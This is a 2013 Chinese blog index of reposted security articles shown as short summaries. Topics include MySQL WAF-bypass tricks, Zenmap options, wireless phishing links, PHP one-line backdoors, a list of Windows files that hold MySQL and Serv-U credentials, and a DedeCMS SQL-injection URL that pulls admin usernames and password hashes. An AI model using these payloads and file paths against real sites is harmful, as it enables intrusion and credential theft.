2013年6月1日

过国内外的waf的一些奇淫绝技<转>

摘要：作者：livers研究过国内外的waf。分享一些奇淫绝技。一些大家都了解的技巧如：/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。Mysqltips1: 神奇的 ` (格式输出表的那个控制符)过空格和一些正则。mysql> select`version`();+----------------------+|`version`()|+----------------------+|5.1.50-community-log |+----------------------+1 row in set(0.00 sec)一个更好玩的技阅读全文

posted @ 2013-06-01 22:52 DemonSpider 阅读(406) 评论(0) 推荐(0)

2013年5月29日

linux的诸个启动级别：init 0,1,2,3,4,5,6《转》

摘要： 0:停机1：单用户形式，只root进行维护2：多用户，不能使用net file system3：完全多用户5：图形化4：安全模式6：重启其实，可以通过查看/etc/rc.d/中的rc*.d的文件来对比理解。。init 0，对应的系统会运行，/etc/rc.d/rc0.d里指定的程序。我们来看下名称。[root@localhost ～]# ls /etc/rc.d/rc0.d K01dnsmasq K15ksmtuned K35nmb K60crond K74lm_sensors K83portreserve K85rpcgssd K88iscsi K90network S00... 阅读全文

posted @ 2013-05-29 17:11 DemonSpider 阅读(332) 评论(0) 推荐(0)

Grep与web漏洞挖掘<转>

摘要：文/SuperHei_[At]_ph4nt0m.org 2006-03-08[a.下面的grep(http://www.interlog.com/~tcharron/grep.html )不支持-r参数,可以使用下面的格式: grep -in "/(include/|require/)" C:/test/*.php C:/test/admin/*.php 也可以使用cygwin移植来的grep(http://zhouzhen.eviloctal.org/Look.asp?LogID=814 ) b.多个关键词or模式使用|,如果使用and模式,可以使用下面的管道模式: gr 阅读全文

posted @ 2013-05-29 09:30 DemonSpider 阅读(350) 评论(0) 推荐(0)

2013年5月19日

Zenmap的用法《转》

摘要：第一种：Intense scan(nmap -T4 -A -v)一般来说，Intense scan可以满足一般扫描-T4 加快执行速度-A 操作系统及版本探测-v 显示详细的输出第二种：Intense scan plus UDP(nmap -sS -sU -T4 -A -v)即UDP扫描-sS TCP SYN 扫描-sU UDP 扫描第三种：Intense scan,all TCP ports(nmap -p 1-65536 -T4 -A -v)扫描所有TCP端口，范围在1-65535，试图扫描所有端口的开放情况，速度比较慢。-p 指定端口扫描范围第四种：Intense scan,no pin 阅读全文

posted @ 2013-05-19 21:00 DemonSpider 阅读(577) 评论(0) 推荐(0)

2013年5月14日

[讨论]“传递式”的攻击思想<转LN>

摘要：刚上课的时候走神，脑袋里多出了一些胡思乱想，这儿记下这些胡思乱想和大家讨论。什么是传递？攻击具有传递性么？ a>b,b>c => a>c 这是数学上的传递，飞鸽传书，烽火传讯是信息的传递，心里学上也有传递性的推理，那么攻击可不可以传递呢。 “水坑”攻击模式 a. 目标常访问的网站 b. 目标网站 c.目标人 a存在一个储存性xss，b有个反射性xss 目标人 -----> a -------> b -------> payload 通过a的传递使得攻击更加隐蔽，是不是感觉一种超强“跨域”效果案例：WooYun: 手把手教你劫持李开复的腾讯微博我把阅读全文

posted @ 2013-05-14 21:14 DemonSpider 阅读(180) 评论(0) 推荐(0)

杂七杂八的敏感文件注释<持续更新帖>

摘要： ============敏感文件读取================WINDOWS下:c:/boot.ini //查看系统版本c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码 c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密. 阅读全文

posted @ 2013-05-14 09:56 DemonSpider 阅读(426) 评论(0) 推荐(0)

2013年5月12日

.htaccess设置指南经典说明<转>

摘要：如果你的服务器目录结构是这样：/usr/corsak/www/maindir如果Apache指令中开启了AllowOverride支持.htaccess文件，每访问一次会依次搜索：/usr/corsak/www/maindir/.htaccess /usr/corsak/www/.htaccess /usr/corsak/.htaccess下面是一份详细的文档，不知道哪年从哪找的。因为在一个国外的空间的根文件夹下看到这个.htaccess,搞不懂是干什么的,在落伍论坛找到一篇文章,先转过来放着,以后再慢慢研究,嘿嘿.. Apache指南: .htaccess文件.htaccess文件提供了针阅读全文

posted @ 2013-05-12 16:00 DemonSpider 阅读(194) 评论(0) 推荐(0)

无线hacking集合贴，持续更新~

摘要： ==================钓鱼篇========================利用Backtrack做Wifi钓鱼 http://www.91ri.org/5123.html《伪造AP简单思路(win7+linux)》 http://www.91ri.org/2863.html《无线Hacking之无线DOS与AP欺骗》。http://www.91ri.org/4901.html伪Soft-AP （wi-fi）架设及捕获数据教程（钓鱼wi-fi架设同数据捕获协议分析）http://hi.baidu.com/tios7ays/item/9ed08675a3dee70ed7a89ca2 阅读全文

posted @ 2013-05-12 15:22 DemonSpider 阅读(341) 评论(0) 推荐(0)

2013年5月10日

那些强悍的PHP一句话后门《转》

摘要：亦家从建立起就有一个很重要的服务项目 – 安全监测，而上线后很少有相关的佐证内容，那从今天开始也就开始了这一部分的分享与撰写。我们以一个学习的心态来对待这些PHP后门程序，很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马1234567891011<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 阅读全文

posted @ 2013-05-10 20:47 DemonSpider 阅读(257) 评论(0) 推荐(0)

2013年5月9日

dede找后台《转》

摘要： From: https://forum.90sec.org/thread-5081-1-1.html首先：注入exp有时候有些 /plus/目录换成了 /plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin` 阅读全文

posted @ 2013-05-09 00:30 DemonSpider 阅读(444) 评论(0) 推荐(0)